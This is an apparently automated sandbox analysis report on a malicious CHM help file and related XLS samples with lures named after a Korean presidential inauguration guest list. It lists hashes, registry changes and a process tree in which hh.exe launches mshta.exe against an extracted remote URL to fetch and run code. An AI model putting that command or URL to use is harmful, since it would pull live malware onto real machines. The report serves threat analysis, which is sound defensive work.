Analysis
-
max time kernel
146s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
21-03-2023 23:17
Behavioral task
behavioral1
Sample
(20220120)2022 - 001.chm
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
(20220120)2022 - 001.chm
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
(์์) ์ 20๋ ๋ํต๋ น ์ทจ์์ ์ฌ์ธ๋ํฌ ์ฐธ์์ ์ถ์ฒ ๋ช ๋จ(๊ตญ๋ฏผ์ํ๋น์ 000).chm
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
(์์) ์ 20๋ ๋ํต๋ น ์ทจ์์ ์ฌ์ธ๋ํฌ ์ฐธ์์ ์ถ์ฒ ๋ช ๋จ(๊ตญ๋ฏผ์ํ๋น์ 000).chm
Resource
win10v2004-20230221-en
Behavioral task
behavioral5
Sample
(์์) ์ 20๋ ๋ํต๋ น ์ทจ์์ ์ฌ์ธ๋ํฌ ์ฐธ์์ ์ถ์ฒ ๋ช ๋จ(๊ตญ๋ฏผ์ํ๋น์ 000).xls
Resource
win7-20230220-en
Behavioral task
behavioral6
Sample
(์์) ์ 20๋ ๋ํต๋ น ์ทจ์์ ์ฌ์ธ๋ํฌ ์ฐธ์์ ์ถ์ฒ ๋ช ๋จ(๊ตญ๋ฏผ์ํ๋น์ 000).xls
Resource
win10v2004-20230220-en
General
-
Target
(20220120)2022 - 001.chm
-
Size
331KB
-
MD5
914521cb6b4846b2c0e85588d5224ba2
-
SHA1
9171d8b916637bd4b1b4348c1744d8f25a2363c6
-
SHA256
a88dc9a152cc7758a1df5aa33cf7b31cdb14e593a8744f2059602a49b8b04e0f
-
SHA512
cfc3f84a08213f8a1883f0ca6164067e4dfa59d8655e0c2f0fcba0bf985555bb0dca00b5eae0bfaa9ad6861736e9dfe57af490faeb53553d60c460a51d3233c8
-
SSDEEP
6144:tWVDblCou9OdcHSgSLaCjPjjaZL4annWryMGfdnSavw/5q/Rhc/UVkRJU1yq9i8y:uM3W0jSL3n4F5nlLW+ye/y
Malware Config
Extracted
http://attiferstudio.com/install.bak/sony/10.html
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
mshta.exeflow pid process 4 516 mshta.exe -
Processes:
hh.exemshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000\Software\Microsoft\Internet Explorer\Main hh.exe Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
hh.exepid process 2016 hh.exe 2016 hh.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
hh.exedescription pid process target process PID 2016 wrote to memory of 516 2016 hh.exe mshta.exe PID 2016 wrote to memory of 516 2016 hh.exe mshta.exe PID 2016 wrote to memory of 516 2016 hh.exe mshta.exe
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" "C:\Users\Admin\AppData\Local\Temp\(20220120)2022 - 001.chm"1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" http://attiferstudio.com/install.bak/sony/10.html ,2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2016-74-0x000007FFFFF90000-0x000007FFFFFA0000-memory.dmpFilesize
64KB